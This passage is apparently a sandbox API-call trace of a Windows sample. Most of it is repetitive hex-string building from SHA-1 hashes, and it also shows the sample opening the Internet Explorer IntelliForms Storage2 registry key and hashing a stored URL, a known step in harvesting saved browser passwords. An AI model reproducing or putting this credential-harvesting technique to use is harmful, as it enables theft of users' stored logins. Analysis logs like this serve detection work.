returned 0x0 [0249.337] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="72") returned 2 [0249.337] lstrlenW (lpString="52C2AA942C9E") returned 12 [0249.337] lstrlenW (lpString="72") returned 2 [0249.337] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0ff0 [0249.337] lstrcpyW (in: lpString1=0xd1d0ff0, lpString2="52C2AA942C9E" | out: lpString1="52C2AA942C9E") returned="52C2AA942C9E" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E", lpString2="72" | out: lpString1="52C2AA942C9E72") returned="52C2AA942C9E72" [0249.338] LocalFree (hMem=0xd1d0650) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="53") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E72") returned 14 [0249.338] lstrlenW (lpString="53") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cfcb0 [0249.338] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="52C2AA942C9E72" | out: lpString1="52C2AA942C9E72") returned="52C2AA942C9E72" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E72", lpString2="53" | out: lpString1="52C2AA942C9E7253") returned="52C2AA942C9E7253" [0249.338] LocalFree (hMem=0xd1d0ff0) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="73") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E7253") returned 16 [0249.338] lstrlenW (lpString="73") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d05a0 [0249.338] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="52C2AA942C9E7253" | out: lpString1="52C2AA942C9E7253") returned="52C2AA942C9E7253" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E7253", lpString2="73" | out: lpString1="52C2AA942C9E725373") returned="52C2AA942C9E725373" [0249.338] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="88") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E725373") returned 18 [0249.338] lstrlenW (lpString="88") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217030 [0249.338] lstrcpyW (in: lpString1=0xd217030, lpString2="52C2AA942C9E725373" | out: lpString1="52C2AA942C9E725373") returned="52C2AA942C9E725373" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E725373", lpString2="88" | out: lpString1="52C2AA942C9E72537388") returned="52C2AA942C9E72537388" [0249.338] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C2") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E72537388") returned 20 [0249.338] lstrlenW (lpString="C2") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217570 [0249.338] lstrcpyW (in: lpString1=0xd217570, lpString2="52C2AA942C9E72537388" | out: lpString1="52C2AA942C9E72537388") returned="52C2AA942C9E72537388" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E72537388", lpString2="C2" | out: lpString1="52C2AA942C9E72537388C2") returned="52C2AA942C9E72537388C2" [0249.338] LocalFree (hMem=0xd217030) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5C") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E72537388C2") returned 22 [0249.338] lstrlenW (lpString="5C") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217c30 [0249.338] lstrcpyW (in: lpString1=0xd217c30, lpString2="52C2AA942C9E72537388C2" | out: lpString1="52C2AA942C9E72537388C2") returned="52C2AA942C9E72537388C2" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E72537388C2", lpString2="5C" | out: lpString1="52C2AA942C9E72537388C25C") returned="52C2AA942C9E72537388C25C" [0249.338] LocalFree (hMem=0xd217570) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B8") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E72537388C25C") returned 24 [0249.338] lstrlenW (lpString="B8") returned 2 [0249.338] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2167f0 [0249.338] lstrcpyW (in: lpString1=0xd2167f0, lpString2="52C2AA942C9E72537388C25C" | out: lpString1="52C2AA942C9E72537388C25C") returned="52C2AA942C9E72537388C25C" [0249.338] lstrcatW (in: lpString1="52C2AA942C9E72537388C25C", lpString2="B8" | out: lpString1="52C2AA942C9E72537388C25CB8") returned="52C2AA942C9E72537388C25CB8" [0249.338] LocalFree (hMem=0xd217c30) returned 0x0 [0249.338] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="58") returned 2 [0249.338] lstrlenW (lpString="52C2AA942C9E72537388C25CB8") returned 26 [0249.339] lstrlenW (lpString="58") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214ce0 [0249.339] lstrcpyW (in: lpString1=0xd214ce0, lpString2="52C2AA942C9E72537388C25CB8" | out: lpString1="52C2AA942C9E72537388C25CB8") returned="52C2AA942C9E72537388C25CB8" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8", lpString2="58" | out: lpString1="52C2AA942C9E72537388C25CB858") returned="52C2AA942C9E72537388C25CB858" [0249.339] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0F") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB858") returned 28 [0249.339] lstrlenW (lpString="0F") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215290 [0249.339] lstrcpyW (in: lpString1=0xd215290, lpString2="52C2AA942C9E72537388C25CB858" | out: lpString1="52C2AA942C9E72537388C25CB858") returned="52C2AA942C9E72537388C25CB858" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB858", lpString2="0F" | out: lpString1="52C2AA942C9E72537388C25CB8580F") returned="52C2AA942C9E72537388C25CB8580F" [0249.339] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2F") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F") returned 30 [0249.339] lstrlenW (lpString="2F") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd2151c0 [0249.339] lstrcpyW (in: lpString1=0xd2151c0, lpString2="52C2AA942C9E72537388C25CB8580F" | out: lpString1="52C2AA942C9E72537388C25CB8580F") returned="52C2AA942C9E72537388C25CB8580F" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F", lpString2="2F" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F") returned="52C2AA942C9E72537388C25CB8580F2F" [0249.339] LocalFree (hMem=0xd215290) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="03") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F2F") returned 32 [0249.339] lstrlenW (lpString="03") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214b40 [0249.339] lstrcpyW (in: lpString1=0xd214b40, lpString2="52C2AA942C9E72537388C25CB8580F2F" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F") returned="52C2AA942C9E72537388C25CB8580F2F" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F2F", lpString2="03" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03") returned="52C2AA942C9E72537388C25CB8580F2F03" [0249.339] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F2F03") returned 34 [0249.339] lstrlenW (lpString="FD") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66ce0 [0249.339] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="52C2AA942C9E72537388C25CB8580F2F03" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03") returned="52C2AA942C9E72537388C25CB8580F2F03" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F2F03", lpString2="FD" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FD") returned="52C2AA942C9E72537388C25CB8580F2F03FD" [0249.339] LocalFree (hMem=0xd214b40) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DB") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F2F03FD") returned 36 [0249.339] lstrlenW (lpString="DB") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66960 [0249.339] lstrcpyW (in: lpString1=0x5d66960, lpString2="52C2AA942C9E72537388C25CB8580F2F03FD" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FD") returned="52C2AA942C9E72537388C25CB8580F2F03FD" [0249.339] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F2F03FD", lpString2="DB" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB") returned="52C2AA942C9E72537388C25CB8580F2F03FDDB" [0249.339] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.339] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7D") returned 2 [0249.339] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F2F03FDDB") returned 38 [0249.339] lstrlenW (lpString="7D") returned 2 [0249.339] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67e60 [0249.339] lstrcpyW (in: lpString1=0x5d67e60, lpString2="52C2AA942C9E72537388C25CB8580F2F03FDDB" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB") returned="52C2AA942C9E72537388C25CB8580F2F03FDDB" [0249.340] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB", lpString2="7D" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB7D") returned="52C2AA942C9E72537388C25CB8580F2F03FDDB7D" [0249.340] LocalFree (hMem=0x5d66960) returned 0x0 [0249.340] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A0") returned 2 [0249.340] lstrlenW (lpString="52C2AA942C9E72537388C25CB8580F2F03FDDB7D") returned 40 [0249.340] lstrlenW (lpString="A0") returned 2 [0249.340] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d667a0 [0249.340] lstrcpyW (in: lpString1=0x5d667a0, lpString2="52C2AA942C9E72537388C25CB8580F2F03FDDB7D" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB7D") returned="52C2AA942C9E72537388C25CB8580F2F03FDDB7D" [0249.340] lstrcatW (in: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB7D", lpString2="A0" | out: lpString1="52C2AA942C9E72537388C25CB8580F2F03FDDB7DA0") returned="52C2AA942C9E72537388C25CB8580F2F03FDDB7DA0" [0249.340] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.340] CryptDestroyHash (hHash=0x5d9e550) returned 1 [0249.340] CryptReleaseContext (hProv=0x5d36e10, dwFlags=0x0) returned 1 [0249.340] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.340] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.340] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.340] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.340] RegEnumValueW (in: hKey=0x94c, dwIndex=0x2, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url21", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.340] StrStrIW (lpFirst="wix.com", lpSrch="?") returned 0x0 [0249.340] StrStrIW (lpFirst="wix.com", lpSrch="http://") returned 0x0 [0249.340] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d38e10) returned 1 [0249.340] CryptCreateHash (in: hProv=0x5d38e10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.340] lstrlenW (lpString="wix.com") returned 7 [0249.340] CryptHashData (hHash=0x5d9e630, pbData=0x43ed4e0, dwDataLen=0x10, dwFlags=0x0) returned 1 [0249.340] CryptGetHashParam (in: hHash=0x5d9e630, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.340] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0E") returned 2 [0249.340] lstrlenW (lpString="") returned 0 [0249.340] lstrlenW (lpString="0E") returned 2 [0249.340] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.340] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.341] lstrcatW (in: lpString1="", lpString2="0E" | out: lpString1="0E") returned="0E" [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D6") returned 2 [0249.341] lstrlenW (lpString="0E") returned 2 [0249.341] lstrlenW (lpString="D6") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.341] lstrcpyW (in: lpString1=0x5d33db0, lpString2="0E" | out: lpString1="0E") returned="0E" [0249.341] lstrcatW (in: lpString1="0E", lpString2="D6" | out: lpString1="0ED6") returned="0ED6" [0249.341] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B3") returned 2 [0249.341] lstrlenW (lpString="0ED6") returned 4 [0249.341] lstrlenW (lpString="B3") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33770 [0249.341] lstrcpyW (in: lpString1=0x5d33770, lpString2="0ED6" | out: lpString1="0ED6") returned="0ED6" [0249.341] lstrcatW (in: lpString1="0ED6", lpString2="B3" | out: lpString1="0ED6B3") returned="0ED6B3" [0249.341] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="58") returned 2 [0249.341] lstrlenW (lpString="0ED6B3") returned 6 [0249.341] lstrlenW (lpString="58") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33950 [0249.341] lstrcpyW (in: lpString1=0x5d33950, lpString2="0ED6B3" | out: lpString1="0ED6B3") returned="0ED6B3" [0249.341] lstrcatW (in: lpString1="0ED6B3", lpString2="58" | out: lpString1="0ED6B358") returned="0ED6B358" [0249.341] LocalFree (hMem=0x5d33770) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="08") returned 2 [0249.341] lstrlenW (lpString="0ED6B358") returned 8 [0249.341] lstrlenW (lpString="08") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33db0 [0249.341] lstrcpyW (in: lpString1=0x5d33db0, lpString2="0ED6B358" | out: lpString1="0ED6B358") returned="0ED6B358" [0249.341] lstrcatW (in: lpString1="0ED6B358", lpString2="08" | out: lpString1="0ED6B35808") returned="0ED6B35808" [0249.341] LocalFree (hMem=0x5d33950) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EC") returned 2 [0249.341] lstrlenW (lpString="0ED6B35808") returned 10 [0249.341] lstrlenW (lpString="EC") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cf940 [0249.341] lstrcpyW (in: lpString1=0xd1cf940, lpString2="0ED6B35808" | out: lpString1="0ED6B35808") returned="0ED6B35808" [0249.341] lstrcatW (in: lpString1="0ED6B35808", lpString2="EC" | out: lpString1="0ED6B35808EC") returned="0ED6B35808EC" [0249.341] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1E") returned 2 [0249.341] lstrlenW (lpString="0ED6B35808EC") returned 12 [0249.341] lstrlenW (lpString="1E") returned 2 [0249.341] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cf9f0 [0249.341] lstrcpyW (in: lpString1=0xd1cf9f0, lpString2="0ED6B35808EC" | out: lpString1="0ED6B35808EC") returned="0ED6B35808EC" [0249.341] lstrcatW (in: lpString1="0ED6B35808EC", lpString2="1E" | out: lpString1="0ED6B35808EC1E") returned="0ED6B35808EC1E" [0249.341] LocalFree (hMem=0xd1cf940) returned 0x0 [0249.341] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9F") returned 2 [0249.341] lstrlenW (lpString="0ED6B35808EC1E") returned 14 [0249.342] lstrlenW (lpString="9F") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cfaa0 [0249.342] lstrcpyW (in: lpString1=0xd1cfaa0, lpString2="0ED6B35808EC1E" | out: lpString1="0ED6B35808EC1E") returned="0ED6B35808EC1E" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E", lpString2="9F" | out: lpString1="0ED6B35808EC1E9F") returned="0ED6B35808EC1E9F" [0249.342] LocalFree (hMem=0xd1cf9f0) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="20") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F") returned 16 [0249.342] lstrlenW (lpString="20") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cfcb0 [0249.342] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="0ED6B35808EC1E9F" | out: lpString1="0ED6B35808EC1E9F") returned="0ED6B35808EC1E9F" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E9F", lpString2="20" | out: lpString1="0ED6B35808EC1E9F20") returned="0ED6B35808EC1E9F20" [0249.342] LocalFree (hMem=0xd1cfaa0) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B4") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F20") returned 18 [0249.342] lstrlenW (lpString="B4") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217b70 [0249.342] lstrcpyW (in: lpString1=0xd217b70, lpString2="0ED6B35808EC1E9F20" | out: lpString1="0ED6B35808EC1E9F20") returned="0ED6B35808EC1E9F20" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E9F20", lpString2="B4" | out: lpString1="0ED6B35808EC1E9F20B4") returned="0ED6B35808EC1E9F20B4" [0249.342] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9D") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F20B4") returned 20 [0249.342] lstrlenW (lpString="9D") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2180b0 [0249.342] lstrcpyW (in: lpString1=0xd2180b0, lpString2="0ED6B35808EC1E9F20B4" | out: lpString1="0ED6B35808EC1E9F20B4") returned="0ED6B35808EC1E9F20B4" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B4", lpString2="9D" | out: lpString1="0ED6B35808EC1E9F20B49D") returned="0ED6B35808EC1E9F20B49D" [0249.342] LocalFree (hMem=0xd217b70) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AB") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F20B49D") returned 22 [0249.342] lstrlenW (lpString="AB") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217870 [0249.342] lstrcpyW (in: lpString1=0xd217870, lpString2="0ED6B35808EC1E9F20B49D" | out: lpString1="0ED6B35808EC1E9F20B49D") returned="0ED6B35808EC1E9F20B49D" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49D", lpString2="AB" | out: lpString1="0ED6B35808EC1E9F20B49DAB") returned="0ED6B35808EC1E9F20B49DAB" [0249.342] LocalFree (hMem=0xd2180b0) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="48") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB") returned 24 [0249.342] lstrlenW (lpString="48") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217570 [0249.342] lstrcpyW (in: lpString1=0xd217570, lpString2="0ED6B35808EC1E9F20B49DAB" | out: lpString1="0ED6B35808EC1E9F20B49DAB") returned="0ED6B35808EC1E9F20B49DAB" [0249.342] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB", lpString2="48" | out: lpString1="0ED6B35808EC1E9F20B49DAB48") returned="0ED6B35808EC1E9F20B49DAB48" [0249.342] LocalFree (hMem=0xd217870) returned 0x0 [0249.342] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="65") returned 2 [0249.342] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB48") returned 26 [0249.342] lstrlenW (lpString="65") returned 2 [0249.342] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214800 [0249.342] lstrcpyW (in: lpString1=0xd214800, lpString2="0ED6B35808EC1E9F20B49DAB48" | out: lpString1="0ED6B35808EC1E9F20B49DAB48") returned="0ED6B35808EC1E9F20B49DAB48" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB48", lpString2="65" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865") returned="0ED6B35808EC1E9F20B49DAB4865" [0249.343] LocalFree (hMem=0xd217570) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865") returned 28 [0249.343] lstrlenW (lpString="B6") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd2151c0 [0249.343] lstrcpyW (in: lpString1=0xd2151c0, lpString2="0ED6B35808EC1E9F20B49DAB4865" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865") returned="0ED6B35808EC1E9F20B49DAB4865" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865", lpString2="B6" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6") returned="0ED6B35808EC1E9F20B49DAB4865B6" [0249.343] LocalFree (hMem=0xd214800) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6") returned 30 [0249.343] lstrlenW (lpString="B6") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215500 [0249.343] lstrcpyW (in: lpString1=0xd215500, lpString2="0ED6B35808EC1E9F20B49DAB4865B6" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6") returned="0ED6B35808EC1E9F20B49DAB4865B6" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6", lpString2="B6" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B6") returned="0ED6B35808EC1E9F20B49DAB4865B6B6" [0249.343] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="80") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6B6") returned 32 [0249.343] lstrlenW (lpString="80") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215df0 [0249.343] lstrcpyW (in: lpString1=0xd215df0, lpString2="0ED6B35808EC1E9F20B49DAB4865B6B6" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B6") returned="0ED6B35808EC1E9F20B49DAB4865B6B6" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B6", lpString2="80" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680") returned="0ED6B35808EC1E9F20B49DAB4865B6B680" [0249.343] LocalFree (hMem=0xd215500) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="96") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6B680") returned 34 [0249.343] lstrlenW (lpString="96") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67e60 [0249.343] lstrcpyW (in: lpString1=0x5d67e60, lpString2="0ED6B35808EC1E9F20B49DAB4865B6B680" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680") returned="0ED6B35808EC1E9F20B49DAB4865B6B680" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680", lpString2="96" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B68096") returned="0ED6B35808EC1E9F20B49DAB4865B6B68096" [0249.343] LocalFree (hMem=0xd215df0) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0B") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6B68096") returned 36 [0249.343] lstrlenW (lpString="0B") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67220 [0249.343] lstrcpyW (in: lpString1=0x5d67220, lpString2="0ED6B35808EC1E9F20B49DAB4865B6B68096" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B68096") returned="0ED6B35808EC1E9F20B49DAB4865B6B68096" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B68096", lpString2="0B" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B") returned="0ED6B35808EC1E9F20B49DAB4865B6B680960B" [0249.343] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.343] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, 